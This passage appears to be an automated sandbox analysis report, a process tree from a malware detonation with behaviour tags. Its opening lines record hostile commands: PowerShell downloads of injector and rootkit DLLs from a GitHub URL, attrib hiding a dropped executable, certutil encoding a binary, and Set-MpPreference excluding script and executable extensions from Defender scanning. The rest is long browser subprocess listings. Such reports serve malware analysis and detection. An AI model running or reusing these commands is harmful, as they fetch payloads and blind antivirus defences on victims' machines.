- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:1012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
-
-
C:\Windows\SysWOW64\certutil.execertutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin3⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
PID:4856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\caca\r77-x64.dll');exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5584
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5592
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff91eedab58,0x7ff91eedab68,0x7ff91eedab782⤵PID:2460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵PID:3508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:82⤵PID:2700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2120 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:82⤵PID:852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:12⤵PID:2664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:12⤵PID:3540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4124 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:12⤵PID:3324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4684 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:82⤵PID:5140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4632 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:82⤵PID:5160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:82⤵PID:5276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵
- Loads dropped DLL
PID:5796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:82⤵PID:2800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3368 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3368 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵PID:1400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1780 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵PID:5840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1008 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵PID:5132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=4044 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵
- Drops file in Program Files directory
PID:5316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2296 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵
- Drops file in Program Files directory
PID:2064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2540 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:82⤵
- Drops file in Program Files directory
PID:1516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2316 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:22⤵PID:5916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=1988,i,7471932929039484398,12174656887931020312,131072 /prefetch:82⤵PID:1796
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:4512
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5860 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff91b8046f8,0x7ff91b804708,0x7ff91b8047182⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:32⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:82⤵PID:2832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:12⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:12⤵PID:1108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:12⤵PID:5548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:12⤵PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:12⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 /prefetch:82⤵PID:5808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:5484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:12⤵PID:6076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2008 /prefetch:82⤵PID:5792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2012 /prefetch:82⤵
- Loads dropped DLL
- Modifies registry class
PID:4328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:12⤵PID:2784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:12⤵PID:2372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵PID:5816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:12⤵PID:5388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:12⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:12⤵PID:2960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:12⤵PID:3592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:12⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:12⤵PID:1532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5236 /prefetch:22⤵
- Loads dropped DLL
PID:5984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:12⤵PID:2680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2308 /prefetch:12⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:12⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:12⤵PID:3188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10535716572122317171,15887539036835979058,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:12⤵PID:5732
-
